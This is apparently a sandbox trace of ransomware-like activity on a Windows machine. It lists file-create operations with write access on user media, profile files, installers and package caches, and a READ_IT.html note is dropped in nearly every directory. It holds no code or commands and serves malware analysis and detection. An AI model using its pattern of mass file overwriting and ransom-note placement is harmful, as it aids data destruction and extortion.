Create	C:\Users\Public\Videos\Sample Videos\Wildlife.wmv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\Sample Media\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Desert.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Koala.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\Kalimba.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Music\Sample Music\Sleep Away.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Libraries\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Libraries\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Libraries\RecordedTV.library-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Downloads\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Documents\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Desktop\Adobe Reader X.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Desktop\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Desktop\Google Chrome.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Public\Desktop\Mozilla Firefox.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT.LOG	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\ntuser.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Videos\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Searches\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Searches\Indexed Locations.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Saved Games\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Links\Desktop.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Links\Downloads.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Links\RecentPlaces.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Get Windows Live.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Autos.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Money.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN Sports.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSN.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\MSN Websites\MSNBC News.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Favorites\Links\Web Slice Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Desktop\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Contacts\Administrator.contact	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\Contacts\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\IconCache.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\Default\AppData\Local\Temp\FXSAPIDebugLogFile.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Sun\Java\Java Update\jaureglist.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Sun\Java\Java Update\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f}\VC_redist.x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\vcredist_x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346}\VC_redist.x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a}\vcredist_x64.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\cab1.cab	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\vc_runtimeMinimum_x86.msi	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\Windows6.1-KB2999226-x64.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages\Patch\x64\Windows6.1-KB2999226-x64.msu	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages\Patch\x64\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Mozilla\logs\maintenanceservice-install.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Mozilla\logs\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Adobe\ARM\Reader_10.0.0\BIT5D7A.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\All Users\Adobe\ARM\Reader_10.0.0\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
